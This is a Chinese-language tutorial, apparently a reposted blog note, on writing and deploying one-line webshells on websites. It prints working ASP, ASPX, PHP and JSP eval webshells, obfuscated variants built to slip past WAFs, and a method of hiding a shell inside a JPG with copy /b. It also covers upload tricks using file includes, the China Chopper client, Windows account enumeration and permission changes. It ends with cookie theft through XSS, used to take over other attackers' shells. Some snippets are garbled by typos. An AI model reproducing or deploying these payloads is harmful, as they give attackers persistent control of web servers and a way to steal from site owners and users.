一句话木啊基础
短,小,强,隐蔽好,powerful,2333333,基于B/S
<%execute request("value")%>
execute是参数
eval是来执行参数的
对于网站来说,要对用上马即支持的运行环境,(iis支持asp、aspx、PHP),asp无权调用cmd,aspx有
asp一句话
<%eval request("c")%>
一般用都是request的值=命令
PHP一句话
<>PHP
@eval($_POST[value]);?>
aspx一句话
<%@
Page Language="jscrit"%>
或者
<%@
eval(Request.Item["value"])%>
jsp
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
变形
双重的request的使用
<?PHP
$_REQUEST['dd']($_REQUEST['chneyouxiu']);?>
对于两个参数,执行可以?a=eval然后就又变成了原本的一句话,可以过掉一些早些年的waf
也可以连菜刀
也可以通过eval来构造查看代码
?a=eval&chenyouxiu=PHPinfo();
减少闭合情况的
<eval(Request(chr(112)))%>
没有单引号,双引号,防止转义在一些情况下
request用chr并且加上自己的value
<%eval (eval(chr(114)+chr(101)+chr(117)+。。。。。。)("chenyouxiu"))%>
这是asp的
PHP拼接用点,asp用加号
等
一句话木马的制作
基本的
通过c32进行在左面上传各种一句话,为了防止网站只运行一种,最好都加
还有用
cmd
做
copy /b 1.jpg+1.asp 2.jpg
还有
图片属性得版权内插
dos语句的使用
这是管理员权限
user query
看有无管理员上线
net user
查看账户
net localgroup administrators
查看管理员权限
然后学习cacls更改权限
setp 绝对路径文件
小马
假如小马为x.asp
然后穿大马
ps:asp下也是asp文件得马,不能错了
然后输入
获取权限...
但基本不行了,23333,版本老了
思路想法:上小马,然后指定目录再上大马,有点麻烦,还不如直接上大马...
但这样的一般都有后门...**************
这个xx.asp可以使用爆破bp(弱口令),也可以尝试进程丢失,爆出密码
?profile=a
大马
功能多,50k以上,还有的用还有后门....
执行能力强,但不加密会被报毒
一句话使用
asp
数据库是as格式得网站,在留言板,或发表文章添加一句话,或加到asp网页
最后还是把
<%execute request("value")%>
文件包含马
上传jpg图片,然后根据jpg得上传名字,因为过掉一些waf,在上传asp得引用,直接访问asp即可
<!--#include file="a.jpg" -->
jsp
首先要开启tomcat服务,然后上传服务端代码,然后确定服务地址,打开,然后上传大马
然后用菜刀2014得custom
然后上传
然后菜刀...
模式为customize,然后编码为utf-8
webshell后门查询
通过k
firebug查看元素
查看发送地址...
看网络得发送请求包
也可wireshark
然后通过地址访问...
可以更改
审计可得
然后黑吃黑
xss获取cookie,然后进行对方登录后台查看,获取cookie
然后用小马哥强注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
